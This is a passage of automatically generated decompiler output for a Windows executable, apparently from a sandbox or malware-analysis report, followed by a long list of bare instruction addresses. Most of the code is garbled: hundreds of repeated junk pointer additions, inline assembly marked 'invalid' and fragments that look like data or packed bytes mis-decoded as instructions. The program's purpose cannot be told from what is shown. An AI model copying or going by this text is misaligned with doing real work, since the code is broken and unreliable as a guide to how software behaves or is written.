						 *_t126 =  *(_t385 + _t359 + 0x20040) + _t329;
						__eflags =  *_t126;
						asm("movsb");
						ds = _t329;
						_t273 = _t329 + 1;
						 *0x7c =  *0x7c + _t273;
						__eflags =  *0x7c;
					}
					_t276 = _t273 +  *_t273 +  *((intOrPtr*)(_t273 +  *_t273)) + 1;
					 *_t359 =  *_t359 + _t379;
					 *_t276 =  *_t276 + _t359;
					 *_t276 =  *_t276 + _t276;
					 *((intOrPtr*)(_t385 + _t359 + 0x30040)) =  *((intOrPtr*)(_t385 + _t359 + 0x30040)) + _t379;
					_t277 = _t276 +  *_t276;
					 *_t277 =  *_t277 + _t277;
					 *_t277 =  *_t277 + _t277;
					 *_t277 =  *_t277 + _t277;
					 *_t277 =  *_t277 + _t277;
					asm("clc");
					asm("sbb al, [eax]");
					 *_t277 =  *_t277 + _t277;
					_t278 = _t277 + 1;
					 *_t359 =  *_t359 + _t278;
					 *_t359 =  *_t359 + _t278;
					 *_t278 =  *_t278 + _t278;
					asm("sbb [eax], al");
					__eflags = _t278;
					 *_t278 =  *_t278 + _t278;
					_t280 = _t278 - 0x20 + 1;
					 *((intOrPtr*)(_t280 + _t280)) =  *((intOrPtr*)(_t280 + _t280)) + _t280;
					_t281 = _t280 +  *_t280;
					 *_t281 =  *_t281 + _t281;
					 *_t281 =  *_t281 + _t281;
					 *_t281 =  *_t281 + _t281;
					 *_t281 =  *_t281 + _t281;
					_t393 = _t277;
					asm("sbb eax, [eax]");
					asm("pushad");
					 *_t281 =  *_t281 + _t359;
					_t282 = _t281 + 1;
					 *((intOrPtr*)(_t282 + _t282)) =  *((intOrPtr*)(_t282 + _t282)) + _t282;
					_t284 = _t282 +  *_t282 + 1;
					 *_t385 =  *_t385 + _t359;
					 *_t284 =  *_t284 + _t284;
					 *_t284 =  *_t284 + _t284;
					_t394 = _t393 + 1;
					 *_t284 =  *_t284 & _t284;
					asm("invalid");
					asm("invalid");
					 *_t284 =  *_t284 + _t284;
					 *_t284 =  *_t284 + _t284;
					 *_t284 =  *_t284 + _t284;
					 *_t284 =  *_t284 + _t284;
					asm("aam 0x1b");
					_t285 = _t284 + 1;
					_t138 = _t285 - 0x4a;
					 *_t138 = 0x7c +  *(_t285 - 0x4a);
					__eflags =  *_t138;
					if ( *_t138 < 0) goto L48;
					 *_t285 =  *_t285 & _t285;
					asm("invalid");
					asm("invalid");
					_t286 = _t285 + 1;
					 *_t359 =  *_t359 + 0x7c;
					 *((intOrPtr*)(_t286 + _t286)) =  *((intOrPtr*)(_t286 + _t286)) + _t286;
					 *((intOrPtr*)(_t385 + _t359 + 0x10040)) =  *((intOrPtr*)(_t385 + _t359 + 0x10040)) + 0x7c;
					_t287 = _t286 +  *_t286;
					 *_t287 =  *_t287 + _t287;
					 *_t287 =  *_t287 + _t287;
					 *_t287 =  *_t287 + _t287;
					 *_t287 =  *_t287 + _t287;
					 *((intOrPtr*)(_t287 + 0x40)) =  *((intOrPtr*)(_t287 + 0x40)) + _t359;
					 *_t369 =  *_t369 + _t287;
					 *_t359 =  *_t359 + _t287;
					_t288 = _t287 + 0x7c;
					asm("sbb al, 0x40");
					 *_t288 =  *_t288 + _t288;
					 *_t288 =  *_t288 + _t288;
					asm("sbb [eax], eax");
					_t290 = _t288 + _t369 - 1;
					asm("sbb [eax], eax");
					asm("adc byte [ecx], 0x40");
					 *((intOrPtr*)(_t387 - 0x73ffbfef)) =  *((intOrPtr*)(_t387 - 0x73ffbfef)) + _t290;
					asm("adc [eax], eax");
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					 *_t290 =  *_t290 + _t290;
					asm("lock sbb [eax], eax");
					_t291 = _t290 - 1;
					asm("sbb [eax], eax");
					asm("adc byte [ecx], 0x40");
					 *((intOrPtr*)(_t387 - 0x73ffbfef)) =  *((intOrPtr*)(_t387 - 0x73ffbfef)) + _t291;
					asm("adc [eax], eax");
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					 *_t291 =  *_t291 + _t291;
					asm("sbb [edx], bl");
					_t292 = _t291 + 1;
					 *((intOrPtr*)(_t292 + 0x19)) =  *((intOrPtr*)(_t292 + 0x19)) + _t369;
					_t293 = _t292 + 1;
					 *((intOrPtr*)(_t293 - 0x79ffbfef)) =  *((intOrPtr*)(_t293 - 0x79ffbfef)) + _t293;
					asm("adc [eax], eax");
					 *_t369 = ss;
					_t294 = _t293 + 1;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *_t294 =  *_t294 + _t294;
					 *((intOrPtr*)(_t294 + 0x1a)) =  *((intOrPtr*)(_t294 + 0x1a)) + _t294;
					_t295 = _t294 + 1;
					 *((intOrPtr*)(_t295 + 0x19)) =  *((intOrPtr*)(_t295 + 0x19)) + _t369;
					_t296 = _t295 + 1;
					 *((intOrPtr*)(_t296 - 0x79ffbfef)) =  *((intOrPtr*)(_t296 - 0x79ffbfef)) + _t296;
					asm("adc [eax], eax");
					 *_t369 = ss;
					_t297 = _t296 + 1;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					 *_t297 =  *_t297 + _t297;
					_t298 = _t297 + _t369;
					asm("sbb al, 0x40");
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					_t162 = _t298 + 0x1a;
					 *_t162 =  *(_t298 + 0x1a) + _t369;
					__eflags =  *_t162;
					asm("sbb [eax], eax");
					asm("adc byte [ecx], 0x40");
					 *((intOrPtr*)(_t387 - 0x73ffbfef)) =  *((intOrPtr*)(_t387 - 0x73ffbfef)) + _t298;
					asm("adc [eax], eax");
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					 *_t298 =  *_t298 + _t298;
					_v28 = _v28 - 0x3f;
					_t395 = _t394 - 0xc;
					 *[fs:0x0] = _t395;
					L004010C0();
					_v48 = _t395;
					_v44 = E00401098;
					_v40 = _v28 & 0x00000001;
					_v28 = _v28 & 0x000000fe;
					 *((intOrPtr*)( *_v28 + 4))(_v28, _t385, _t387, _t359, 0x50,  *[fs:0x0], 0x4010c6, _t389, 0x4800401a, 0x5000401c, _t394);
					__eflags =  *0x411594;
					if( *0x411594 != 0) {
						_v92 = 0x411594;
					} else {
						_push(0x411594);
						_push(0x402090);
						L00401174();
						_v92 = 0x411594;
					}
					_v64 =  *_v92;
					_t313 =  *((intOrPtr*)( *_v64 + 0x14))(_v64,  &_v44);
					asm("fclex");
					_v68 = _t313;
					__eflags = _v68;
					if(_v68 >= 0) {
						_t190 =  &_v96;
						 *_t190 = _v96 & 0x00000000;
						__eflags =  *_t190;
					} else {
						_push(0x14);
						_push(0x402080);
						_push(_v64);
						_push(_v68);
						L0040116E();
						_v96 = _t313;
					}
					_v72 = _v44;
					_t318 =  *((intOrPtr*)( *_v72 + 0x60))(_v72,  &_v40);
					asm("fclex");
					_v76 = _t318;
					__eflags = _v76;
					if(_v76 >= 0) {
						_t203 =  &_v100;
						 *_t203 = _v100 & 0x00000000;
						__eflags =  *_t203;
					} else {
						_push(0x60);
						_push(0x4020a0);
						_push(_v72);
						_push(_v76);
						L0040116E();
						_v100 = _t318;
					}
					_v88 = _v40;
					_v40 = _v40 & 0x00000000;
					L0040117A();
					L00401168();
					_t323 =  *((intOrPtr*)( *_a4 + 0x288))(_a4,  &_v44);
					asm("fclex");
					_v64 = _t323;
					__eflags = _v64;
					if(_v64 >= 0) {
						_t221 =  &_v104;
						 *_t221 = _v104 & 0x00000000;
						__eflags =  *_t221;
					} else {
						_push(0x288);
						_push(0x401f54);
						_push(_a4);
						_push(_v64);
						L0040116E();
						_v104 = _t323;
					}
					_push(0);
					_push(0);
					_push(_v44);
					_t324 =  &_v60;
					_push(_t324);
					L0040115C();
					_push(_t324);
					L00401162();
					_v36 = _t324;
					L00401168();
					L00401156(); // executed
					_t325 = E004107AE(_t359,  &_v60, _t385, _t387); // executed
					_v8 = 0;
					_push(E0041078F);
					L00401150();
					L00401150();
					return _t325;
				} else {
					return _t232;
				}
			}






























































































































                                  0x00401198
                                  0x00401198
                                  0x00401198
                                  0x00401198
                                  0x0040119d
                                  0x004011a2
                                  0x004011a4
                                  0x004011a6
                                  0x004011a8
                                  0x004011aa
                                  0x004011ac
                                  0x004011ad
                                  0x004011af
                                  0x004011b1
                                  0x004011b3
                                  0x004011b3
                                  0x004011b4
                                  0x004011b6
                                  0x00401201
                                  0x00401202
                                  0x00401204
                                  0x00401205
                                  0x00401206
                                  0x00401208
                                  0x00401209
                                  0x0040120b
                                  0x0040120f
                                  0x00401210
                                  0x00401216
                                  0x00401217
                                  0x0040121e
                                  0x00401220
                                  0x00401221
                                  0x00401224
                                  0x00401225
                                  0x00401227
                                  0x00401229
                                  0x0040122b
                                  0x0040122d
                                  0x0040122f
                                  0x00401231
                                  0x00401233
                                  0x00401235
                                  0x00401237
                                  0x00401239
                                  0x0040123b
                                  0x0040123d
                                  0x0040123f
                                  0x00401241
                                  0x00401243
                                  0x00401245
                                  0x00401247
                                  0x00401249
                                  0x00401250
                                  0x00401252
                                  0x00401254
                                  0x00401254
                                  0x00401255
                                  0x00401256
                                  0x004012cc
                                  0x004012cc
                                  0x004012cd
                                  0x004012cd
                                  0x004012cd
                                  0x004012d0
                                  0x00000000
                                  0x004012d2
                                  0x004012d2
                                  0x004012d3
                                  0x004012d6
                                  0x004012db
                                  0x004012e0
                                  0x004012e2
                                  0x004012e4
                                  0x004012e6
                                  0x004012e8
                                  0x004012ea
                                  0x004012ea
                                  0x004012ed
                                  0x00000000
                                  0x004012ef
                                  0x004012ef
                                  0x004012f0
                                  0x004012f1
                                  0x004012f3
                                  0x004012f4
                                  0x004012f6
                                  0x004012f6
                                  0x004012f9
                                  0x004012fb
                                  0x004012fc
                                  0x004012fd
                                  0x004012ff
                                  0x004012ff
                                  0x00401304
                                  0x00000000
                                  0x00401304
                                  0x004012f9
                                  0x004012ed
                                  0x00401258
                                  0x00401258
                                  0x00401259
                                  0x0040125d
                                  0x0040125f
                                  0x00401264
                                  0x00401265
                                  0x00401266
                                  0x00401267
                                  0x00401268
                                  0x00401269
                                  0x0040126a
                                  0x0040126c
                                  0x0040126e
                                  0x0040126f
                                  0x00401272
                                  0x00401275
                                  0x00401277
                                  0x00401278
                                  0x00401279
                                  0x0040127a
                                  0x00401280
                                  0x00401282
                                  0x00401284
                                  0x00401285
                                  0x00401287
                                  0x0040128a
                                  0x0040128c
                                  0x0040128d
                                  0x00401290
                                  0x00401292
                                  0x00401294
                                  0x00401296
                                  0x00401298
                                  0x00401298
                                  0x00401298
                                  0x0040129b
                                  0x00401306
                                  0x00401306
                                  0x00401307
                                  0x0040130b
                                  0x0040130d
                                  0x0040130f
                                  0x00401311
                                  0x00401311
                                  0x00000000
                                  0x0040129d
                                  0x0040129d
                                  0x0040129e
                                  0x0040129f
                                  0x004012a1
                                  0x004012a2
                                  0x004012a4
                                  0x004012a4
                                  0x004012a4
                                  0x004012a7
                                  0x00401312
                                  0x00401312
                                  0x00401312
                                  0x00401317
                                  0x00000000
                                  0x00401319
                                  0x00401319
                                  0x0040131b
                                  0x0040131d
                                  0x00401324
                                  0x00401324
                                  0x0040132a
                                  0x0040132c
                                  0x0040132e
                                  0x0040132e
                                  0x00000000
                                  0x0040132e
                                  0x0040132a
                                  0x00000000
                                  0x004012a9
                                  0x004012a9
                                  0x004012aa
                                  0x004012ad
                                  0x004012b2
                                  0x004012b7
                                  0x004012b9
                                  0x004012bb
                                  0x004012bd
                                  0x004012bf
                                  0x004012c1
                                  0x004012c1
                                  0x004012c4
                                  0x0040132f
                                  0x0040132f
                                  0x00401331
                                  0x00401334
                                  0x00401335
                                  0x00401337
                                  0x0040133a
                                  0x0040133a
                                  0x0040133b
                                  0x0040133b
                                  0x0040133d
                                  0x0040133f
                                  0x00401341
                                  0x00401343
                                  0x00401345
                                  0x00401347
                                  0x00401349
                                  0x0040134a
                                  0x0040134a
                                  0x0040134c
                                  0x0040134e
                                  0x00401350
                                  0x00401352
                                  0x00401355
                                  0x00401358
                                  0x00401358
                                  0x0040135a
                                  0x0040135b
                                  0x0040135b
                                  0x0040135d
                                  0x0040135d
                                  0x0040135f
                                  0x0040135f
                                  0x00401361
                                  0x00401362
                                  0x004012c6
                                  0x004012c6
                                  0x004012c7
                                  0x004012c8
                                  0x004012ca
                                  0x004012cb
                                  0x004012cb
                                  0x00000000
                                  0x004012cb
                                  0x004012c4
                                  0x004012a7
                                  0x0040129b
                                  0x00401364
                                  0x00401366
                                  0x00401368
                                  0x0040136a
                                  0x0040136c
                                  0x0040136e
                                  0x0040136e
                                  0x00401370
                                  0x00401372
                                  0x00401373
                                  0x00401375
                                  0x00401377
                                  0x00401379
                                  0x0040137b
                                  0x0040137d
                                  0x0040137f
                                  0x00401381
                                  0x00401383
                                  0x00401383
                                  0x00401385
                                  0x00401387
                                  0x00401389
                                  0x0040138b
                                  0x0040138d
                                  0x00401392
                                  0x00401393
                                  0x00401395
                                  0x00401397
                                  0x0040139d
                                  0x0040139f
                                  0x004013a1
                                  0x004013a3
                                  0x004013a5
                                  0x004013a7
                                  0x004013ae
                                  0x004013b0
                                  0x004013b3
                                  0x004013b5
                                  0x004013b9
                                  0x004013bb
                                  0x004013bd
                                  0x004013bf
                                  0x004013c1
                                  0x004013c3
                                  0x004013c5
                                  0x004013ca
                                  0x004013cb
                                  0x004013cd
                                  0x004013cf
                                  0x004013d4
                                  0x004013d6
                                  0x004013d8
                                  0x004013da
                                  0x004013dc
                                  0x004013de
                                  0x004013e0
                                  0x004013e2
                                  0x004013e3
                                  0x004013e5
                                  0x004013eb
                                  0x004013ed
                                  0x004013ef
                                  0x004013f1
                                  0x004013f3
                                  0x004013f5
                                  0x004013f7
                                  0x004013f9
                                  0x004013fb
                                  0x004013fd
                                  0x004013fe
                                  0x004013ff
                                  0x00401402
                                  0x00401403
                                  0x00401405
                                  0x00401407
                                  0x0040140d
                                  0x0040140f
                                  0x00401411
                                  0x00401413
                                  0x00401415
                                  0x00401417
                                  0x0040141a
                                  0x0040141b
                                  0x0040141d
                                  0x0040141f
                                  0x00401421
                                  0x00401423
                                  0x00401425
                                  0x00401429
                                  0x0040142b
                                  0x0040142d
                                  0x0040142f
                                  0x00401431
                                  0x00401433
                                  0x00401436
                                  0x00401437
                                  0x0040143a
                                  0x0040143b
                                  0x0040143d
                                  0x0040143f
                                  0x00401441
                                  0x00401441
                                  0x00401442
                                  0x00401442
                                  0x00401444
                                  0x00401446
                                  0x00401448
                                  0x0040144a
                                  0x0040144c
                                  0x0040144e
                                  0x00401450
                                  0x00401451
                                  0x00401453
                                  0x00401455
                                  0x00401457
                                  0x00401459
                                  0x0040145b
                                  0x0040145d
                                  0x0040145f
                                  0x00401461
                                  0x00401463
                                  0x00401465
                                  0x00401467
                                  0x00401469
                                  0x0040146b
                                  0x00401471
                                  0x00401474
                                  0x00401476
                                  0x00401476
                                  0x00401478
                                  0x0040147a
                                  0x0040147c
                                  0x0040147e
                                  0x00401480
                                  0x00401482
                                  0x00401484
                                  0x00401486
                                  0x00401488
                                  0x0040148b
                                  0x0040148e
                                  0x0040148e
                                  0x0040148e
                                  0x00401492
                                  0x00401498
                                  0x0040149d
                                  0x0040149f
                                  0x004014a0
                                  0x004014a2
                                  0x004014a4
                                  0x004014a6
                                  0x004014a8
                                  0x004014aa
                                  0x004014ac
                                  0x004014ae
                                  0x004014b0
                                  0x004014b2
                                  0x004014b4
                                  0x004014b6
                                  0x004014b8
                                  0x004014ba
                                  0x004014bc
                                  0x004014be
                                  0x004014c0
                                  0x004014c2
                                  0x004014c4
                                  0x004014c6
                                  0x004014c8
                                  0x004014ca
                                  0x004014cd
                                  0x004014cf
                                  0x004014d1
                                  0x004014d3
                                  0x004014d5
                                  0x004014d8
                                  0x004014d9
                                  0x004014db
                                  0x004014de
                                  0x004014e0
                                  0x004014e2
                                  0x004014e3
                                  0x004014e6
                                  0x004014ea
                                  0x004014ee
                                  0x004014ef
                                  0x004014f0
                                  0x004014f2
                                  0x004014f4
                                  0x004014f6
                                  0x004014f8
                                  0x004014fa
                                  0x004014fc
                                  0x004014fe
                                  0x00401500
                                  0x00401502
                                  0x00401504
                                  0x00401506
                                  0x00401508
                                  0x0040150a
                                  0x0040150c
                                  0x0040150e
                                  0x00401510
                                  0x00401512
                                  0x00401514
                                  0x00401516
                                  0x00401518
                                  0x0040151a
                                  0x0040151c
                                  0x0040151d
                                  0x0040151f
                                  0x00401521
                                  0x00401523
                                  0x0040152a
                                  0x0040152c
                                  0x0040152d
                                  0x0040152e
                                  0x00401533
                                  0x00401535
                                  0x00401537
                                  0x00401539
                                  0x0040153b
                                  0x0040153d
                                  0x0040153f
                                  0x00401542
                                  0x00401544
                                  0x00401546
                                  0x00401548
                                  0x0040154a
                                  0x0040154c
                                  0x00401550
                                  0x00401552
                                  0x00401554
                                  0x00401556
                                  0x00401558
                                  0x0040155a
                                  0x0040155e
                                  0x0040155f
                                  0x00401563
                                  0x00401565
                                  0x00401567
                                  0x00401569
                                  0x0040156b
                                  0x0040156d
                                  0x0040156f
                                  0x0040156f
                                  0x00401570
                                  0x00401572
                                  0x00401574
                                  0x00401579
                                  0x0040157b
                                  0x0040157e
                                  0x0040157f
                                  0x00401586
                                  0x00401588
                                  0x0040158e
                                  0x00401590
                                  0x00401590
                                  0x00401591
                                  0x00401593
                                  0x00401595
                                  0x00401597
                                  0x00401599
                                  0x0040159b
                                  0x0040159d
                                  0x0040159f
                                  0x004015a1
                                  0x004015a3
                                  0x004015a3
                                  0x004015a3
                                  0x004015a6
                                  0x0040160d
                                  0x0040160d
                                  0x00401610
                                  0x00401612
                                  0x00401615
                                  0x00401616
                                  0x00401617
                                  0x00401619
                                  0x0040161b
                                  0x0040161e
                                  0x0040161f
                                  0x00401621
                                  0x00401623
                                  0x00401623
                                  0x00401623
                                  0x00000000
                                  0x004015a8
                                  0x004015a8
                                  0x004015a9
                                  0x004015ad
                                  0x004015ae
                                  0x004015b3
                                  0x00401625
                                  0x00401625
                                  0x00401626
                                  0x00401627
                                  0x00401629
                                  0x0040162b
                                  0x0040162e
                                  0x0040162f
                                  0x00401631
                                  0x00401637
                                  0x0040163a
                                  0x0040163b
                                  0x0040163b
                                  0x0040163b
                                  0x004015b5
                                  0x004015b5
                                  0x004015b6
                                  0x004015c1
                                  0x004015c1
                                  0x004015c9
                                  0x004015cc
                                  0x004015d3
                                  0x004015d5
                                  0x004015d7
                                  0x004015d9
                                  0x004015db
                                  0x004015de
                                  0x004015df
                                  0x004015e1
                                  0x004015e3
                                  0x004015e5
                                  0x004015e7
                                  0x004015ea
                                  0x004015eb
                                  0x004015ee
                                  0x004015ef
                                  0x004015f1
                                  0x004015f3
                                  0x004015f9
                                  0x004015fb
                                  0x004015fd
                                  0x004015ff
                                  0x00401601
                                  0x00401603
                                  0x00401606
                                  0x00401607
                                  0x00401609
                                  0x0040160b
                                  0x0040160b
                                  0x0040160b
                                  0x00000000
                                  0x0040160b
                                  0x004015c9
                                  0x004015b3
                                  0x00401640
                                  0x00401642
                                  0x00401642
                                  0x00401644
                                  0x00401646
                                  0x00401648
                                  0x0040166b
                                  0x0040166b
                                  0x0040166b
                                  0x0040166b
                                  0x0040166e
                                  0x00401670
                                  0x00401671
                                  0x00401674
                                  0x00401676
                                  0x00401678
                                  0x0040167a
                                  0x0040167c
                                  0x0040167d
                                  0x0040167f
                                  0x0040167f
                                  0x0040164a
                                  0x0040164a
                                  0x0040164b
                                  0x00401651
                                  0x00401653
                                  0x00401656
                                  0x00401658
                                  0x00401659
                                  0x0040165c
                                  0x0040165e
                                  0x00401660
                                  0x00401662
                                  0x00401664
                                  0x00401666
                                  0x00401666
                                  0x00401668
                                  0x0040166a
                                  0x0040166a
                                  0x00000000
                                  0x0040166a
                                  0x00401668
                                  0x00401680
                                  0x00401686
                                  0x00401687
                                  0x0040168d
                                  0x00401690
                                  0x00401692
                                  0x00401694
                                  0x00401696
                                  0x00401698
                                  0x0040169a
                                  0x0040169c
                                  0x0040169e
                                  0x004016a0
                                  0x004016a2
                                  0x004016a4
                                  0x004016a6
                                  0x004016a8
                                  0x004016aa
                                  0x004016ac
                                  0x004016ae
                                  0x004016b0
                                  0x004016b2
                                  0x004016b4
                                  0x004016b6
                                  0x004016b8
                                  0x004016ba
                                  0x004016bc
                                  0x004016be
                                  0x004016c0
                                  0x004016c2
                                  0x004016c4
                                  0x004016c6
                                  0x004016c8
                                  0x004016ca
                                  0x004016cc
                                  0x004016ce
                                  0x004016d0
                                  0x004016d2
                                  0x004016d4
                                  0x004016d6
                                  0x004016d8
                                  0x004016da
                                  0x004016dc
                                  0x004016de
                                  0x004016e0
                                  0x004016e2
                                  0x004016e4
                                  0x004016e6
                                  0x004016e8
                                  0x004016ea
                                  0x004016ec
                                  0x004016ee
                                  0x004016f0
                                  0x004016f2
                                  0x004016f4
                                  0x004016f6
                                  0x004016f8
                                  0x004016fa
                                  0x004016fc
                                  0x004016fe
                                  0x00401700
                                  0x00401702
                                  0x00401704
                                  0x00401706
                                  0x00401708
                                  0x0040170a
                                  0x0040170c
                                  0x0040170d
                                  0x0040170f
                                  0x00401711
                                  0x00401713
                                  0x00401715
                                  0x00401719
                                  0x0040171e
                                  0x0040171f
